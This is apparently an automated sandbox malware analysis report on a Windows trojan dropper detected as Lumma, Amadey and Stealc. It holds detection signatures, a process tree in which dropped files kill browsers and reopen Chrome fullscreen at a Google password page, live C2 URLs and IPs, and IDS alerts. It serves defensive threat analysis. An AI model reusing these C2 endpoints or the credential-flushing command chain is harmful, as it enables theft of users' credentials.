Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
8ObkdHP9Hq.exe

Overview

General Information

Sample name:8ObkdHP9Hq.exe
renamed because original name is a hash value
Original sample name:77b69071ccc75e75a48ea59d48a55a30.exe
Analysis ID:1527565
MD5:77b69071ccc75e75a48ea59d48a55a30
SHA1:1462b225e40ce72df31075d9ca920a356818fe3c
SHA256:e7dd285dc9f2ba81816427bb3a6f90645deb0b8d346d2edb81e9283a1bdbf787
Tags:32exetrojan
Infos:

Detection

LummaC, Amadey, Credential Flusher, Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Excessive usage of taskkill to terminate processes
Found API chain indicative of sandbox detection
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Potentially malicious time measurement code found
Searches for specific processes (likely to inject)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

  • System is w10x64
  • 8ObkdHP9Hq.exe (PID: 6796 cmdline: "C:\Users\user\Desktop\8ObkdHP9Hq.exe" MD5: 77B69071CCC75E75A48EA59D48A55A30)
    • skotes.exe (PID: 4416 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 77B69071CCC75E75A48EA59D48A55A30)
  • skotes.exe (PID: 7692 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 77B69071CCC75E75A48EA59D48A55A30)
    • 84d280a9e8.exe (PID: 7884 cmdline: "C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe" MD5: A914737C9AF5014B7CD65B6649094707)
      • taskkill.exe (PID: 7904 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 7912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 7984 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 8048 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 8056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 8112 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 8120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 8176 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 8184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chrome.exe (PID: 344 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --start-fullscreen --no-first-run --disable-session-crashed-bubble --disable-infobars MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 2668 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 5544 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5648 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 2916 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5808 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 6904 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5800 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 5964 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4484 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 8164 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2904 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 5232 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4516 --field-trial-handle=2240,i,13949646483110312368,15407111442915167702,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • num.exe (PID: 2488 cmdline: "C:\Users\user\AppData\Local\Temp\1000336001\num.exe" MD5: 791FCEE57312D4A20CC86AE1CEA8DFC4)
    • 9d7da53f74.exe (PID: 5236 cmdline: "C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe" MD5: 86FEA273D36E3F9C8221E22B937B1929)
  • 84d280a9e8.exe (PID: 6488 cmdline: "C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe" MD5: A914737C9AF5014B7CD65B6649094707)
    • taskkill.exe (PID: 6456 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • conhost.exe (PID: 6544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • taskkill.exe (PID: 6624 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • conhost.exe (PID: 6636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • taskkill.exe (PID: 6932 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • conhost.exe (PID: 7040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • taskkill.exe (PID: 6408 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • conhost.exe (PID: 4080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • taskkill.exe (PID: 7632 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • chrome.exe (PID: 7932 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --start-fullscreen --no-first-run --disable-session-crashed-bubble --disable-infobars MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 8136 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1152 --field-trial-handle=2040,i,8769351574913738686,7511269282204500585,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • taskkill.exe (PID: 2800 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • conhost.exe (PID: 4904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • taskkill.exe (PID: 4584 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • conhost.exe (PID: 1448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • taskkill.exe (PID: 6580 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • conhost.exe (PID: 6556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • taskkill.exe (PID: 5596 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • conhost.exe (PID: 7144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • taskkill.exe (PID: 280 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • conhost.exe (PID: 7424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • chrome.exe (PID: 2140 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --start-fullscreen --no-first-run --disable-session-crashed-bubble --disable-infobars MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 5984 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1992,i,7048868189645442855,15603037541109083957,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • taskkill.exe (PID: 7964 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • conhost.exe (PID: 7928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • taskkill.exe (PID: 8012 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • taskkill.exe (PID: 8040 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • conhost.exe (PID: 8136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • taskkill.exe (PID: 6196 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • conhost.exe (PID: 6448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • taskkill.exe (PID: 1784 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • chrome.exe (PID: 2112 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --start-fullscreen --no-first-run --disable-session-crashed-bubble --disable-infobars MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 7288 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1152,i,15500864807837732652,8979653825790183584,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • taskkill.exe (PID: 4076 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • conhost.exe (PID: 2380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • taskkill.exe (PID: 5744 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • conhost.exe (PID: 1732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • taskkill.exe (PID: 7440 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • conhost.exe (PID: 7416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • taskkill.exe (PID: 1712 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • taskkill.exe (PID: 3720 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • conhost.exe (PID: 6168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • num.exe (PID: 6516 cmdline: "C:\Users\user\AppData\Local\Temp\1000336001\num.exe" MD5: 791FCEE57312D4A20CC86AE1CEA8DFC4)
  • 9d7da53f74.exe (PID: 7244 cmdline: "C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exe" MD5: 86FEA273D36E3F9C8221E22B937B1929)
  • 84d280a9e8.exe (PID: 5996 cmdline: "C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe" MD5: A914737C9AF5014B7CD65B6649094707)
    • taskkill.exe (PID: 3964 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • conhost.exe (PID: 3444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\num[1].exeJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\num[1].exeJoeSecurity_StealcYara detected StealcJoe Security
        C:\Users\user\AppData\Local\Temp\1000336001\num.exeJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          C:\Users\user\AppData\Local\Temp\1000336001\num.exeJoeSecurity_StealcYara detected StealcJoe Security
            SourceRuleDescriptionAuthorStrings
            00000005.00000002.2955176966.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              0000002C.00000002.2630021156.0000000000587000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
                00000019.00000002.2953823488.0000000000DE8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialFlusherYara detected Credential FlusherJoe Security
                  00000006.00000002.2951418045.0000000001088000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialFlusherYara detected Credential FlusherJoe Security
                    00000014.00000000.2430826993.0000000000B81000.00000080.00000001.01000000.0000000C.sdmpJoeSecurity_StealcYara detected StealcJoe Security
                      Click to see the 17 entries
                      SourceRuleDescriptionAuthorStrings
                      20.2.num.exe.b80000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                        44.0.num.exe.b80000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                          44.2.num.exe.b80000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                            20.0.num.exe.b80000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                              0.2.8ObkdHP9Hq.exe.880000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                                Click to see the 2 entries

                                System Summary

                                barindex
                                Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7692, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\84d280a9e8.exe
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7692, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\84d280a9e8.exe
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-10-07T03:23:23.986667+020020546531A Network Trojan was detected192.168.2.461043104.21.53.8443TCP
                                2024-10-07T03:24:09.272966+020020546531A Network Trojan was detected192.168.2.461190104.21.53.8443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-10-07T03:23:23.986667+020020498361A Network Trojan was detected192.168.2.461043104.21.53.8443TCP
                                2024-10-07T03:24:09.272966+020020498361A Network Trojan was detected192.168.2.461190104.21.53.8443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-10-07T03:23:14.334415+020020197142Potentially Bad Traffic192.168.2.449842185.215.113.10380TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-10-07T03:23:13.485515+020020446961A Network Trojan was detected192.168.2.449836185.215.113.4380TCP
                                2024-10-07T03:23:17.841800+020020446961A Network Trojan was detected192.168.2.449872185.215.113.4380TCP
                                2024-10-07T03:23:23.082188+020020446961A Network Trojan was detected192.168.2.461038185.215.113.4380TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-10-07T03:23:21.647743+020020564771Domain Observed Used for C2 Detected192.168.2.4537461.1.1.153UDP
                                2024-10-07T03:23:43.173115+020020564771Domain Observed Used for C2 Detected192.168.2.4632941.1.1.153UDP
                                2024-10-07T03:24:07.057096+020020564771Domain Observed Used for C2 Detected192.168.2.4493521.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-10-07T03:23:21.564333+020020564711Domain Observed Used for C2 Detected192.168.2.4602821.1.1.153UDP
                                2024-10-07T03:23:43.117801+020020564711Domain Observed Used for C2 Detected192.168.2.4516491.1.1.153UDP
                                2024-10-07T03:24:06.988623+020020564711Domain Observed Used for C2 Detected192.168.2.4621591.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-10-07T03:23:21.613978+020020564811Domain Observed Used for C2 Detected192.168.2.4626761.1.1.153UDP
                                2024-10-07T03:23:43.150741+020020564811Domain Observed Used for C2 Detected192.168.2.4560351.1.1.153UDP
                                2024-10-07T03:24:07.025019+020020564811Domain Observed Used for C2 Detected192.168.2.4499321.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-10-07T03:23:21.589812+020020564831Domain Observed Used for C2 Detected192.168.2.4514331.1.1.153UDP
                                2024-10-07T03:23:43.140460+020020564831Domain Observed Used for C2 Detected192.168.2.4528891.1.1.153UDP
                                2024-10-07T03:24:07.014039+020020564831Domain Observed Used for C2 Detected192.168.2.4638221.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-10-07T03:23:21.683050+020020564731Domain Observed Used for C2 Detected192.168.2.4550381.1.1.153UDP
                                2024-10-07T03:23:43.193494+020020564731Domain Observed Used for C2 Detected192.168.2.4587351.1.1.153UDP
                                2024-10-07T03:24:07.091065+020020564731Domain Observed Used for C2 Detected192.168.2.4634681.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-10-07T03:23:21.575022+020020564851Domain Observed Used for C2 Detected192.168.2.4654961.1.1.153UDP
                                2024-10-07T03:23:43.128999+020020564851Domain Observed Used for C2 Detected192.168.2.4561701.1.1.153UDP
                                2024-10-07T03:24:06.999080+020020564851Domain Observed Used for C2 Detected192.168.2.4560281.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-10-07T03:23:21.662027+020020564751Domain Observed Used for C2 Detected192.168.2.4502721.1.1.153UDP
                                2024-10-07T03:23:43.183098+020020564751Domain Observed Used for C2 Detected192.168.2.4510581.1.1.153UDP
                                2024-10-07T03:24:07.080294+020020564751Domain Observed Used for C2 Detected192.168.2.4636951.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-10-07T03:23:21.626466+020020564791Domain Observed Used for C2 Detected192.168.2.4491861.1.1.153UDP
                                2024-10-07T03:23:43.161724+020020564791Domain Observed Used for C2 Detected192.168.2.4543101.1.1.153UDP
                                2024-10-07T03:24:07.045887+020020564791Domain Observed Used for C2 Detected192.168.2.4509841.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-10-07T03:23:16.011313+020020442431Malware Command and Control Activity Detected192.168.2.449854185.215.113.3780TCP
                                2024-10-07T03:23:34.740482+020020442431Malware Command and Control Activity Detected192.168.2.461131185.215.113.3780TCP
                                2024-10-07T03:23:59.307685+020020442431Malware Command and Control Activity Detected192.168.2.461184185.215.113.3780TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-10-07T03:23:06.470678+020028561471A Network Trojan was detected192.168.2.449788185.215.113.4380TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-10-07T03:23:12.788051+020028561221A Network Trojan was detected185.215.113.4380192.168.2.449804TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-10-07T03:23:09.457328+020028033053Unknown Traffic192.168.2.449810185.215.113.10380TCP
                                2024-10-07T03:23:14.334415+020028033053Unknown Traffic192.168.2.449842185.215.113.10380TCP
                                2024-10-07T03:23:18.561231+020028033053Unknown Traffic192.168.2.449879185.215.113.10380TCP

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Source: 8ObkdHP9Hq.exeAvira: detected
                                Source: http://185.215.113.37URL Reputation: Label: malware
                                Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
                                Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
                                Source: http://185.215.113.37/URL Reputation: Label: malware
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeAvira: detection malicious, Label: TR/Crypt.ZPACK.Gen
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeAvira: detection malicious, Label: TR/Crypt.ZPACK.Gen
